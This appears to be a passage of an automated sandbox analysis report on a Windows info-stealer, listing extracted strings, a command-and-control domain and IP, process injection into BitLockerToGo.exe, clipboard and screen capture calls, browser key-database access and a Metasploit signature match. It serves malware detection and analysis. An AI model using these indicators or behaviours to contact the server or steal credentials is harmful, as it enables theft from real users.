Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe | String found in binary or memory: https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.
Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe | String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
Source: file.exe | String found in binary or memory: https://manage.windowsazure.com/publishsettings/indexnon-CONNECT
Source: file.exe | String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexMaximum
Source: file.exe | String found in binary or memory: https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://datab
Source: file.exe | String found in binary or memory: https://management.azure.comINVALID
Source: file.exe | String found in binary or memory: https://management.chinacloudapi.cntoo
Source: file.exe | String found in binary or memory: https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netbad
Source: file.exe | String found in binary or memory: https://protobuf.dev/reference/go/faq#namespace-conflictLZMA
              Source: BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/
              Source: BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/&6
              Source: BitLockerToGo.exe, 00000005.00000003.2462485236.0000000002F41000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/0
              Source: BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/?6a
              Source: BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398470292.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/D7
              Source: BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/api
              Source: BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apiT
              Source: BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apiar
              Source: BitLockerToGo.exe, 00000005.00000002.2531924515.0000000002E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apihort
              Source: BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2398248173.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apii
              Source: BitLockerToGo.exe, 00000005.00000003.2470610228.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419422712.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462610333.0000000002EE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/apizen
              Source: BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/w6
              Source: BitLockerToGo.exe, 00000005.00000003.2398142344.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397680492.0000000002F11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397264679.0000000002F11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/y7
              Source: BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop/~6
              Source: BitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2420113247.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2463146392.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483801676.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418852252.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2470403875.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2483094012.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2419343297.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2418983675.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/api
              Source: BitLockerToGo.exe, 00000005.00000003.2531309021.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.2532039828.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/api-release/key4.dbPK
              Source: BitLockerToGo.exe, 00000005.00000003.2490547443.0000000002F0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shatterbreathepsw.shop:443/apirosoft
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exeString found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comjson:
              Source: file.exeString found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000005.00000003.2389832770.0000000002F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000005.00000003.2462415774.000000000526A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: BitLockerToGo.exe, 00000005.00000003.2462415774.000000000526A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: BitLockerToGo.exe, 00000005.00000003.2454550554.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000005.00000003.2462513783.0000000002F0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.19:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1E8E0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02D1E8E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1E8E0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_02D1E8E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 5_2_02D1F713 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,5_2_02D1F713

              System Summary

              Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D10352 | 5_2_02D10352
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF1750 | 5_2_02CF1750
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D10AD0 | 5_2_02D10AD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF4BB0 | 5_2_02CF4BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF3390 | 5_2_02CF3390
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D153B0 | 5_2_02D153B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF41C0 | 5_2_02CF41C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF8160 | 5_2_02CF8160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D1863B | 5_2_02D1863B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D27620 | 5_2_02D27620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF3780 | 5_2_02CF3780
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF5760 | 5_2_02CF5760
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF64E0 | 5_2_02CF64E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D1BBF2 | 5_2_02D1BBF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D17B8C | 5_2_02D17B8C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CF6B00 | 5_2_02CF6B00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D15F0E | 5_2_02D15F0E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D2C9C0 | 5_2_02D2C9C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D249C0 | 5_2_02D249C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D11FA1 | 5_2_02D11FA1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D0CCF0 | 5_2_02D0CCF0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02CFFDE0 | 5_2_02CFFDE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D2CD00 | 5_2_02D2CD00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D18D3B | 5_2_02D18D3B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 02CF8B40 appears 64 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 02CF9430 appears 186 times
              Source: file.exe | Static PE information: Number of sections : 12 > 10
              Source: file.exe, 00000000.00000002.2357283198.00007FF67A133000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileName vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C0002EC000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C0001D7000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000002.2354687188.000000C000212000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe, 00000000.00000003.2342735024.000001E6FBA50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe
              Source: file.exe | Binary or memory string: OriginalFileName vs file.exe
              Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 5_2_02D1D4D1 CoCreateInstance, | 5_2_02D1D4D1
              Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\Public\Libraries\lhlip.scif
              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\system32\2bac949abffefe65784249a736b77326ada5ae81bd7dd8b644174f400402909eAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
              Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: file.exe | ReversingLabs: Detection: 34%
              Source: file.exe | Virustotal: Detection: 37%
              Source: file.exe | String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
              Source: file.exe | String found in binary or memory: failed to construct HKDF label: %scrypto/rsa: missing public moduluscrypto/des: invalid buffer overlapinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizebad tag in lazy extension decodingmismatching field: got %v, want %vlzma: wrong uncompressed data size" is unexported but missing PkgPathreflect.MakeSlice of non-slice typecrypto/md5: invalid hash state sizeencoding/hex: odd length hex string2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativepostgres.database.usgovcloudapi.nethttps://database.usgovcloudapi.net/unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhttps://management.chinacloudapi.cntoo many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natmime: bogus characters after %%: %qhash/crc32: invalid hash state sizeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitydelimiters may only be "{}" or "<>"file %q has a name conflict over %vchacha20: output smaller than inputstring field contains invalid UTF-8%v already implements proto.Messagelzma: unsupported chunk header byteop is neither a match nor a literalnewRangeDecoder: d.code >= d.nrange%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0truncated input (or invalid offset)crypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point support6ba7b810-9dad-11d1-80b4-00c04fd430c86ba7b811-9dad-11d1-80b4-00c04fd430c86ba7b812-9dad-11d1-80b4-00c04fd430c86ba7b814-9dad-11d1-80b4-00c04fd430c8accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called w
              Source: file.exe | String found in binary or memory: failed to construct HKDF label: %scrypto/rsa: missing public moduluscrypto/des: invalid buffer overlapinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizebad tag in lazy extension decodingmismatching field: got %v, want %vlzma: wrong uncompressed data size" is unexported but missing PkgPathreflect.MakeSlice of non-slice typecrypto/md5: invalid hash state sizeencoding/hex: odd length hex string2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativepostgres.database.usgovcloudapi.nethttps://database.usgovcloudapi.net/unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKhttps://management.chinacloudapi.cntoo many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natmime: bogus characters after %%: %qhash/crc32: invalid hash state sizeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitydelimiters may only be "{}" or "<>"file %q has a name conflict over %vchacha20: output smaller than inputstring field contains invalid UTF-8%v already implements proto.Messagelzma: unsupported chunk header byteop is neither a match nor a literalnewRangeDecoder: d.code >= d.nrange%d extra bits on block, should be 0zero matchoff and matchlen (%d) > 0truncated input (or invalid offset)crypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point support6ba7b810-9dad-11d1-80b4-00c04fd430c86ba7b811-9dad-11d1-80b4-00c04fd430c86ba7b812-9dad-11d1-80b4-00c04fd430c86ba7b814-9dad-11d1-80b4-00c04fd430c8accessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called w
              Source: file.exe | String found in binary or memory: net/addrselect.go
              Source: file.exe | String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
              Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
              Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\file.exe | Section loaded: umpdc.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
